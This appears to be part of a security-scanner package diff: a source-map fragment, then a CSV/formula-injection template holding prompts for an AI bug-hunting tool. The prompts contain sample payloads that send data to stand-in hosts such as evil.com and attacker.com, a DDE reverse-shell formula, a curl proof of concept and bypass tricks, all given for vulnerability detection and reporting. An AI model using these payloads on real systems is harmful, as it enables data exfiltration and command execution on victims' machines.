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"}

package/dist/hunt/templates/csv-injection.d.ts ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ import type { VulnerabilityTemplate } from '../../types.js';
2	+ export declare const csvInjection: VulnerabilityTemplate;

package/dist/hunt/templates/csv-injection.js ADDED Viewed

@@ -0,0 +1,148 @@
+export const csvInjection = {
+    id: 'csv-injection',
+    name: 'CSV / Formula Injection',
+    cwe: 'CWE-1236',
+    filePatterns: ['csv', 'export', 'download', 'spreadsheet', 'report', 'excel', 'generate', 'xlsx', 'xls'],
+    negativePatterns: [],
+    triagePrompt: `You are a security researcher hunting for CSV/formula injection vulnerabilities.
+Analyze the code for places where user-controlled data is written to CSV, XLSX, or other spreadsheet formats without sanitizing formula-triggering characters. When the exported file is opened in Excel, Google Sheets, or LibreOffice, injected formulas can execute commands or exfiltrate data.
+DANGEROUS CELL PREFIXES:
+- = (formula): =1+1 executes, =HYPERLINK("http://evil.com/"&A1,"Click") exfiltrates data
+- + (formula): +1+1 treated as formula in many spreadsheet applications
+- - (formula): -1+1 treated as formula
+- @ (function): @SUM(A1:A10) in some spreadsheet applications
+- | (pipe): |cmd in some contexts
+- \\t (tab): can break out of the current cell into adjacent cells
+ATTACK SCENARIOS:
+1. Data exfiltration via HYPERLINK:
+   =HYPERLINK("http://evil.com/steal?data="&A1&B1&C1, "Click for Details")
+   When victim clicks, their data is sent to attacker's server
+2. Command execution via DDE (Dynamic Data Exchange):
+   =cmd|'/C calc.exe'!A1  (Windows — opens calculator, replace with reverse shell)
+   Works in older Excel versions and when DDE is enabled
+3. Remote file inclusion:
+   =IMPORTDATA("http://evil.com/payload.csv")  (Google Sheets specific)
+4. Social engineering via crafted hyperlinks:
+   =HYPERLINK("http://evil.com/login","Update your password here")
+WHAT TO LOOK FOR IN CODE:
+- CSV generation functions: csv.writer, createObjectCsvWriter, json2csv, papaparse
+- String concatenation into CSV cells without escaping
+- User-controlled fields: name, description, comment, address, notes
+- No sanitization of cell values before writing to CSV
+- Template literals or string interpolation building CSV rows
+CORRECT SANITIZATION:
+- Prefix dangerous cells with a single quote: ' before = + - @ | \\t
+  (The quote is hidden in spreadsheet display but prevents formula execution)
+- Or prefix with a tab character followed by the value
+- Or wrap ALL cells in explicit string type when generating XLSX
+- Or strip/reject formula characters from user input before storage
+FALSE POSITIVE FILTERS:
+- CSV files that only contain system-generated data (no user input in cells)
+- Export functions with proper sanitization: value.replace(/^[=+\\-@|\\t]/, "'$&")
+- XLSX libraries that set cell type to 'string' explicitly (prevents formula parsing)
+ENTRY POINTS:
+- Admin dashboard export buttons (export users, export orders, export reports)
+- API endpoints that return CSV: /api/export?format=csv
+- Scheduled report generation sent via email
+- User-facing download features (download my data, download transactions)
+KNOWN BYPASS TECHNIQUES:
+- Unicode homoglyphs: using = lookalike (U+FF1D) that some parsers normalize
+- Encoding tricks: %3D (=) in URL-encoded input that gets decoded before CSV write
+- Nested quotes: breaking out of CSV quoting to inject formula in adjacent cell
+- Multiline injection: newline in field value creates new CSV row with formula
+- Tab injection: \\t in field value shifts data to next column, formula in shifted column
+RELEVANT SPECIFICATIONS:
+- CWE-1236: Improper Neutralization of Formula Elements in a CSV File
+- OWASP CSV Injection Guidance
+- RFC 4180: Common Format and MIME Type for CSV Files
+For each finding, cite the EXACT export function, which user-controlled fields are included, and what sanitization is missing.`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a CSV/formula injection vulnerability.
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+VERIFICATION STEPS:
+1. Identify the export endpoint and function
+2. Trace which database fields are included in the export
+3. Determine which of those fields accept user input (names, descriptions, comments)
+4. Check if any sanitization exists for formula-triggering characters (= + - @ | \\t)
+5. Verify the user can control the field content (registration form, profile edit, etc.)
+6. Confirm the output format (CSV, XLSX) and how it's opened by the target audience
+PROOF-OF-CONCEPT:
+\`\`\`
+Step 1: Create a user account with name:
+  =HYPERLINK("http://attacker.com/steal?data="&B2&C2,"Normal Name")
+Step 2: Wait for admin to export users to CSV
+Step 3: When admin opens CSV in Excel:
+  - Cell displays "Normal Name" (looks legitimate)
+  - When clicked, sends data from adjacent cells to attacker.com
+Alternative — command execution:
+  Name: =cmd|'/C powershell -e <base64_reverse_shell>'!A1
+  (Requires DDE to be enabled — older Excel or user clicks "Enable")
+\`\`\`
+\`\`\`bash
+# Register with malicious name
+curl -X POST /api/register \\
+  -H "Content-Type: application/json" \\
+  -d '{"name": "=HYPERLINK(\\"http://evil.com/\\"&A2,\\"John Smith\\")", "email": "attacker@evil.com"}'
+# Trigger export (as admin)
+curl -X GET /api/admin/export/users?format=csv \\
+  -H "Authorization: Bearer <admin-token>" \\
+  -o users.csv
+# Inspect CSV — malicious formula should be present unescaped
+cat users.csv | grep HYPERLINK
+\`\`\`
+SEVERITY ASSESSMENT:
+- High: Formula injection in exports consumed by admins/support staff (social engineering + data exfil)
+- High: DDE command execution in environments where DDE is enabled
+- Medium: Formula injection in user-facing exports (self-XSS equivalent, lower impact)
+- Medium: Data exfiltration via HYPERLINK requiring victim click
+- Low: Formula injection in exports that are only consumed programmatically (not opened in spreadsheets)
+IMPACT AMPLIFIERS:
+- Export is emailed to multiple recipients (wider blast radius)
+- Export contains sensitive data in adjacent cells (PII, financial data)
+- Target organization uses older Excel with DDE enabled
+- Admin exports are routine/trusted (victim unlikely to be suspicious)
+RELEVANT SPECIFICATIONS:
+- CWE-1236: Improper Neutralization of Formula Elements in a CSV File
+- RFC 4180: Common Format and MIME Type for CSV Files
+Cite exact file paths, line numbers, the export function, and which user-controlled field is unsanitized.`,
+    knownBypasses: [
+        'Unicode homoglyphs: fullwidth equals sign (U+FF1D) normalized to = by some parsers',
+        'URL-encoding: %3D decoded to = before CSV generation',
+        'Nested CSV quoting: breaking out of quoted field to inject formula in adjacent cell',
+        'Multiline injection: newline character creates new row with formula',
+        'Tab injection: \\t shifts data to next column where formula prefix lands',
+        'IMPORTDATA function (Google Sheets): fetch remote CSV into spreadsheet',
+    ],
+    specReferences: [
+        'CWE-1236 (Improper Neutralization of Formula Elements in a CSV File)',
+        'OWASP CSV Injection Guidance',
+        'RFC 4180 (Common Format and MIME Type for CSV Files)',
+    ],
+    severityRange: ['medium', 'high'],
+};
+//# sourceMappingURL=csv-injection.js.map

package/dist/hunt/templates/csv-injection.js.map ADDED Viewed

@@ -0,0 +1 @@

+ {"version":3,"file":"csv-injection.js","sourceRoot":"","sources":["../../../src/hunt/templates/csv-injection.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,YAAY,GAA0B;IACjD,EAAE,EAAE,eAAe;IACnB,IAAI,EAAE,yBAAyB;IAC/B,GAAG,EAAE,UAAU;IACf,YAAY,EAAE,CAAC,KAAK,EAAE,QAAQ,EAAE,UAAU,EAAE,aAAa,EAAE,QAAQ,EAAE,OAAO,EAAE,UAAU,EAAE,MAAM,EAAE,KAAK,CAAC;IACxG,gBAAgB,EAAE,EAAE;IACpB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;+HAgE+G;IAE7H,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;0GA4DwF;IAExG,aAAa,EAAE;QACb,oFAAoF;QACpF,sDAAsD;QACtD,qFAAqF;QACrF,qEAAqE;QACrE,0EAA0E;QAC1E,wEAAwE;KACzE;IACD,cAAc,EAA